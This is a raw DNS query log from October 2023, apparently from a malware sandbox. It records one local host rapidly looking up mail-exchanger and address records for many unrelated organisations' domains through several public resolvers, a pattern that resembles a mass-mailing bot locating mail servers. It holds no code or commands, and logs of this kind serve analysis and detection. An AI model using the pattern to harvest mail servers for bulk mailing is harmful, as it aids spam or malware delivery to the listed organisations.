                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.656795025 CEST216.194.168.112192.168.2.30x797aNo error (0)np011.seMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.690953016 CEST91.217.21.20192.168.2.30x8578No error (0)irkut.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.690953016 CEST91.217.21.20192.168.2.30x8578No error (0)irkut.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.690953016 CEST91.217.21.20192.168.2.30x8578No error (0)irkut.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.690953016 CEST91.217.21.20192.168.2.30x8578No error (0)irkut.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.690953016 CEST91.217.21.20192.168.2.30x8578No error (0)irkut.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.690953016 CEST91.217.21.20192.168.2.30x8578No error (0)irkut.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.711780071 CEST1.1.1.1192.168.2.30x7cdNo error (0)domains2.uniserve.com216.113.192.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.741681099 CEST66.234.112.70192.168.2.30x897aNo error (0)fedteldirect.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.886475086 CEST13.107.236.2192.168.2.30xbb7cNo error (0)ch2m.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.886475086 CEST13.107.236.2192.168.2.30xbb7cNo error (0)ch2m.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.909914017 CEST216.113.192.6192.168.2.30xbb7cNo error (0)pacificcoast.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.997162104 CEST1.1.1.1192.168.2.30x324No error (0)ns1.epbinternet.net74.205.143.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.016155005 CEST1.226.85.4192.168.2.30xbb7cNo error (0)nscable.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.162581921 CEST1.1.1.1192.168.2.30xc847No error (0)ns-1553.awsdns-02.co.uk205.251.198.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.170953989 CEST1.1.1.1192.168.2.30x7637No error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.214113951 CEST74.205.143.2192.168.2.30x9480No error (0)epbfi.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.214113951 CEST74.205.143.2192.168.2.30x9480No error (0)epbfi.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.326077938 CEST205.251.198.17192.168.2.30x9782No error (0)ghnt.nhs.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.332108974 CEST97.74.107.28192.168.2.30xa782No error (0)mrhc.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.332108974 CEST97.74.107.28192.168.2.30xa782No error (0)mrhc.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.334621906 CEST108.162.193.242192.168.2.30xb782No error (0)cropking.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.334621906 CEST108.162.193.242192.168.2.30xb782No error (0)cropking.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.334621906 CEST108.162.193.242192.168.2.30xb782No error (0)cropking.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.335469007 CEST1.1.1.1192.168.2.30x3c4eNo error (0)jim.ns.cloudflare.com173.245.59.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.335469007 CEST1.1.1.1192.168.2.30x3c4eNo error (0)jim.ns.cloudflare.com172.64.33.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.335469007 CEST1.1.1.1192.168.2.30x3c4eNo error (0)jim.ns.cloudflare.com108.162.193.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.500653982 CEST173.245.59.125192.168.2.30xba84No error (0)fbconcord.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.502651930 CEST1.1.1.1192.168.2.30x6ec4No error (0)ns3.digitalwest.net72.29.160.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.582175016 CEST1.1.1.1192.168.2.30xdf4fNo error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.582175016 CEST1.1.1.1192.168.2.30xdf4fNo error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.582175016 CEST1.1.1.1192.168.2.30xdf4fNo error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.582175016 CEST1.1.1.1192.168.2.30xdf4fNo error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.673690081 CEST72.29.160.241192.168.2.30xcd86No error (0)slochamber.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.741353035 CEST1.1.1.1192.168.2.30x5b31No error (0)authns1.cv.net167.206.12.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.804398060 CEST1.1.1.1192.168.2.30xcec8No error (0)aoinko.net157.7.107.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.978621960 CEST167.206.12.12192.168.2.30x3e89No error (0)cablevision.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:48.072233915 CEST195.78.223.242192.168.2.30x3e89No error (0)mclink.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:48.072233915 CEST195.78.223.242192.168.2.30x3e89No error (0)mclink.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:48.074647903 CEST149.112.112.112192.168.2.30x9169No error (0)certifiedtileandmarble.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:48.449604034 CEST1.1.1.1192.168.2.30xac63Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:48.641351938 CEST1.1.1.1192.168.2.30x6e84Server failure (2)yhsll.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:48.641362906 CEST1.1.1.1192.168.2.30x6e84Server failure (2)yhsll.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:48.641372919 CEST1.1.1.1192.168.2.30x6e84Server failure (2)yhsll.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:48.762222052 CEST1.1.1.1192.168.2.30x2161No error (0)ssm.ch93.189.66.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:48.949407101 CEST1.1.1.1192.168.2.30x46eeNo error (0)fdlymca.org192.124.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.062160015 CEST1.1.1.1192.168.2.30xd48dNo error (0)agulatex.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.301960945 CEST1.1.1.1192.168.2.30xdd31Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.301975965 CEST1.1.1.1192.168.2.30xdd31Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.301985979 CEST1.1.1.1192.168.2.30xdd31Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.302037954 CEST1.1.1.1192.168.2.30xdd31Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.660269022 CEST1.1.1.1192.168.2.30xbd26No error (0)ns3.combell.net83.217.73.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.660291910 CEST1.1.1.1192.168.2.30xbd26No error (0)ns3.combell.net83.217.73.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.836554050 CEST208.67.220.220192.168.2.30x42a5No error (0)minock.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.836554050 CEST208.67.220.220192.168.2.30x42a5No error (0)minock.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.839833975 CEST1.1.1.1192.168.2.30x42a5No error (0)adinet.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.839847088 CEST1.1.1.1192.168.2.30x42a5No error (0)rootfest.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.839847088 CEST1.1.1.1192.168.2.30x42a5No error (0)rootfest.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.860080004 CEST8.8.4.4192.168.2.30x52a5No error (0)univ-paris-diderot.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.860080004 CEST8.8.4.4192.168.2.30x52a5No error (0)univ-paris-diderot.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.860080004 CEST8.8.4.4192.168.2.30x52a5No error (0)univ-paris-diderot.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.860080004 CEST8.8.4.4192.168.2.30x52a5No error (0)univ-paris-diderot.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.862627983 CEST208.67.220.220192.168.2.30x52a5No error (0)etna-alternance.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.862627983 CEST208.67.220.220192.168.2.30x52a5No error (0)etna-alternance.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.862627983 CEST208.67.220.220192.168.2.30x52a5No error (0)etna-alternance.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.862627983 CEST208.67.220.220192.168.2.30x52a5No error (0)etna-alternance.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.862627983 CEST208.67.220.220192.168.2.30x52a5No error (0)etna-alternance.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.862674952 CEST8.8.4.4192.168.2.30x52a5No error (0)samtack.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.862674952 CEST8.8.4.4192.168.2.30x52a5No error (0)samtack.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.862674952 CEST8.8.4.4192.168.2.30x52a5No error (0)samtack.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.862674952 CEST8.8.4.4192.168.2.30x52a5No error (0)samtack.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.862674952 CEST8.8.4.4192.168.2.30x52a5No error (0)samtack.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.865664959 CEST208.67.220.220192.168.2.30x42a5No error (0)cutemailbox.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.865664959 CEST208.67.220.220192.168.2.30x42a5No error (0)cutemailbox.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.865664959 CEST208.67.220.220192.168.2.30x42a5No error (0)cutemailbox.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.865664959 CEST208.67.220.220192.168.2.30x42a5No error (0)cutemailbox.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.879817963 CEST1.1.1.1192.168.2.30x90a5No error (0)mx2.nifty.com106.153.227.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.879817963 CEST1.1.1.1192.168.2.30x90a5No error (0)mx2.nifty.com106.153.226.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.880024910 CEST1.1.1.1192.168.2.30x90a5No error (0)mailin100.dcpserver.de212.53.180.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.880024910 CEST1.1.1.1192.168.2.30x90a5No error (0)mailin100.dcpserver.de212.53.180.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.880024910 CEST1.1.1.1192.168.2.30x90a5No error (0)mailin100.dcpserver.de212.53.180.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.880280018 CEST1.1.1.1192.168.2.30x81a5No error (0)a3.vi2software.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.883099079 CEST149.112.112.112192.168.2.30x52a5No error (0)klett.rsMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.883099079 CEST149.112.112.112192.168.2.30x52a5No error (0)klett.rsMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.883099079 CEST149.112.112.112192.168.2.30x52a5No error (0)klett.rsMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.883611917 CEST9.9.9.9192.168.2.30x42a5No error (0)optilink.usMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.883611917 CEST9.9.9.9192.168.2.30x42a5No error (0)optilink.usMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.887404919 CEST9.9.9.9192.168.2.30x81a5No error (0)mxa-00300601.gslb.pphosted.com148.163.146.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.887583017 CEST8.8.8.8192.168.2.30x90a5No error (0)mx.yandex.ru77.88.21.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.889617920 CEST1.0.0.1192.168.2.30x42a5No error (0)mariareinamarianistas.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.889617920 CEST1.0.0.1192.168.2.30x42a5No error (0)mariareinamarianistas.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.889617920 CEST1.0.0.1192.168.2.30x42a5No error (0)mariareinamarianistas.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.889617920 CEST1.0.0.1192.168.2.30x42a5No error (0)mariareinamarianistas.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.889617920 CEST1.0.0.1192.168.2.30x42a5No error (0)mariareinamarianistas.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.894012928 CEST208.67.222.222192.168.2.30xa0a5No error (0)mta-gw.infomaniak.ch83.166.143.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.894012928 CEST208.67.222.222192.168.2.30xa0a5No error (0)mta-gw.infomaniak.ch83.166.143.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.897736073 CEST208.67.220.220192.168.2.30x7a7No error (0)mx.yandex.net77.88.21.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.898339987 CEST208.67.220.220192.168.2.30x7a7No error (0)mailstream-west.mxrecord.io172.65.220.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.899791002 CEST9.9.9.9192.168.2.30x33a5No error (0)fhbg.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.900475025 CEST9.9.9.9192.168.2.30x52a5No error (0)ymaio.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.903979063 CEST208.67.222.222192.168.2.30x7a7No error (0)mxa-0034a001.gslb.pphosted.com148.163.140.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.907263994 CEST8.8.8.8192.168.2.30x7a7No error (0)cp-tel-net.mx.av-mx.com150.136.204.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.907325029 CEST149.112.112.112192.168.2.30x52a5No error (0)lancemore.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.907325029 CEST149.112.112.112192.168.2.30x52a5No error (0)lancemore.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.907325029 CEST149.112.112.112192.168.2.30x52a5No error (0)lancemore.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.909432888 CEST1.0.0.1192.168.2.30x7a7No error (0)mxb-00033b02.gslb.pphosted.com148.163.147.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.916210890 CEST8.8.4.4192.168.2.30x42a5No error (0)sninternet.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.917772055 CEST208.67.222.222192.168.2.30x52a5No error (0)equalt.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.918180943 CEST1.1.1.1192.168.2.30x17a7No error (0)cluster1a.eu.messagelabs.com46.137.95.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.918198109 CEST8.8.8.8192.168.2.30x81a5No error (0)troygroup.com.2.0001.arsmtp.com8.19.118.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.921948910 CEST8.8.4.4192.168.2.30x81a5No error (0)whistlerlibrary.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.921948910 CEST8.8.4.4192.168.2.30x81a5No error (0)whistlerlibrary.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.922373056 CEST1.1.1.1192.168.2.30x17a7No error (0)gourmet7.spamgourmet.com216.75.62.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.926033020 CEST1.0.0.1192.168.2.30x17a7No error (0)mx02.xnote.us172.105.237.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.927323103 CEST9.9.9.9192.168.2.30x17a7No error (0)aspmx3.googlemail.com142.250.152.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.928581953 CEST8.8.8.8192.168.2.30x17a7No error (0)smtp.safesysmail.com204.193.139.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.928581953 CEST8.8.8.8192.168.2.30x17a7No error (0)smtp.safesysmail.com68.171.164.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.928581953 CEST8.8.8.8192.168.2.30x17a7No error (0)smtp.safesysmail.com68.171.164.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.928581953 CEST8.8.8.8192.168.2.30x17a7No error (0)smtp.safesysmail.com204.193.139.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.930288076 CEST9.9.9.9192.168.2.30x46a7No error (0)em4.mainnetmail.com142.93.233.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.933698893 CEST8.8.8.8192.168.2.30x27a7No error (0)centrum-cz-10mx1.eco-mx.czmx-stl.eco-mx.czCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.933698893 CEST8.8.8.8192.168.2.30x27a7No error (0)mx-stl.eco-mx.cz46.255.225.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.937230110 CEST8.8.4.4192.168.2.30x46a7No error (0)em4.mainnetmail.com142.93.233.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.945375919 CEST1.1.1.1192.168.2.30x46a7No error (0)mxa-003d6e01.gslb.pphosted.com185.132.181.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.949610949 CEST8.8.4.4192.168.2.30x17a7No error (0)rapinfosolutions-com.mail.protection.outlook.com104.47.74.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.956620932 CEST156.154.132.200192.168.2.30x65a7No error (0)mx02.xnote.us172.105.237.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.957220078 CEST1.1.1.1192.168.2.30x33a5No error (0)gftg.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.958091974 CEST208.67.222.222192.168.2.30x7a7No error (0)nsp2.thold-it.de37.157.250.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.962424040 CEST208.67.222.222192.168.2.30x17a7No error (0)mx4.burnserver.com167.99.227.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.962641954 CEST8.8.8.8192.168.2.30x46a7No error (0)pcl-com.mail.protection.outlook.com104.47.75.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.962641954 CEST8.8.8.8192.168.2.30x46a7No error (0)pcl-com.mail.protection.outlook.com104.47.75.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.967283964 CEST9.9.9.9192.168.2.30x56a7No error (0)gourmet7.spamgourmet.com216.75.62.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.971013069 CEST83.217.73.172192.168.2.30x33a5No error (0)vmbuildingsolutions.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.973766088 CEST1.1.1.1192.168.2.30x42a5No error (0)husi.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.976192951 CEST8.8.4.4192.168.2.30x46a7No error (0)cury-net.mail.protection.outlook.com52.101.8.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.976192951 CEST8.8.4.4192.168.2.30x46a7No error (0)cury-net.mail.protection.outlook.com52.101.9.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.976192951 CEST8.8.4.4192.168.2.30x46a7No error (0)cury-net.mail.protection.outlook.com52.101.9.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.976192951 CEST8.8.4.4192.168.2.30x46a7No error (0)cury-net.mail.protection.outlook.com52.101.42.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.976192951 CEST8.8.4.4192.168.2.30x46a7No error (0)cury-net.mail.protection.outlook.com52.101.40.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.976192951 CEST8.8.4.4192.168.2.30x46a7No error (0)cury-net.mail.protection.outlook.com52.101.40.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.976192951 CEST8.8.4.4192.168.2.30x46a7No error (0)cury-net.mail.protection.outlook.com52.101.9.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.997947931 CEST1.1.1.1192.168.2.30x606bNo error (0)ns6444.hostgator.com192.254.233.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.007025957 CEST1.1.1.1192.168.2.30x7a7No error (0)mail2.g1.pair.com66.39.3.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.016669989 CEST8.8.8.8192.168.2.30x17a7No error (0)mx1.mijndomein.nl185.233.34.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.016669989 CEST8.8.8.8192.168.2.30x17a7No error (0)mx1.mijndomein.nl185.233.34.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.016669989 CEST8.8.8.8192.168.2.30x17a7No error (0)mx1.mijndomein.nl185.233.34.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.073405981 CEST1.0.0.1192.168.2.30x81a5No error (0)personeltedarik.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.142745972 CEST109.122.98.114192.168.2.30x75a7No error (0)smtp.vektor.net109.122.98.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.184813976 CEST192.254.233.150192.168.2.30x5dabNo error (0)polishprincess.us192.254.233.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.203244925 CEST1.1.1.1192.168.2.30x52a5No error (0)digitalmind.rsMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.303626060 CEST208.67.220.220192.168.2.30x42a5No error (0)medianis.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.357168913 CEST1.0.0.1192.168.2.30x46a7No error (0)mspool.cdt.cz81.19.33.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.362502098 CEST1.0.0.1192.168.2.30x52a5No error (0)otegroup.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.403039932 CEST1.1.1.1192.168.2.30xc917No error (0)ikulani.com157.7.107.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.404406071 CEST9.9.9.9192.168.2.30x17a7No error (0)centrum-cz-10mx1.eco-mx.czmx-stl.eco-mx.czCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.404406071 CEST9.9.9.9192.168.2.30x17a7No error (0)mx-stl.eco-mx.cz46.255.225.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.703109026 CEST1.1.1.1192.168.2.30x59a2No error (0)ns1.pontualti.com.br186.227.204.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.850419998 CEST1.1.1.1192.168.2.30x3ab4No error (0)sidepath.com34.193.69.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.850419998 CEST1.1.1.1192.168.2.30x3ab4No error (0)sidepath.com34.193.204.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.850419998 CEST1.1.1.1192.168.2.30x3ab4No error (0)sidepath.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:50.850419998 CEST1.1.1.1192.168.2.30x3ab4No error (0)sidepath.com75.2.70.75A (IP address)IN (0x0001)false
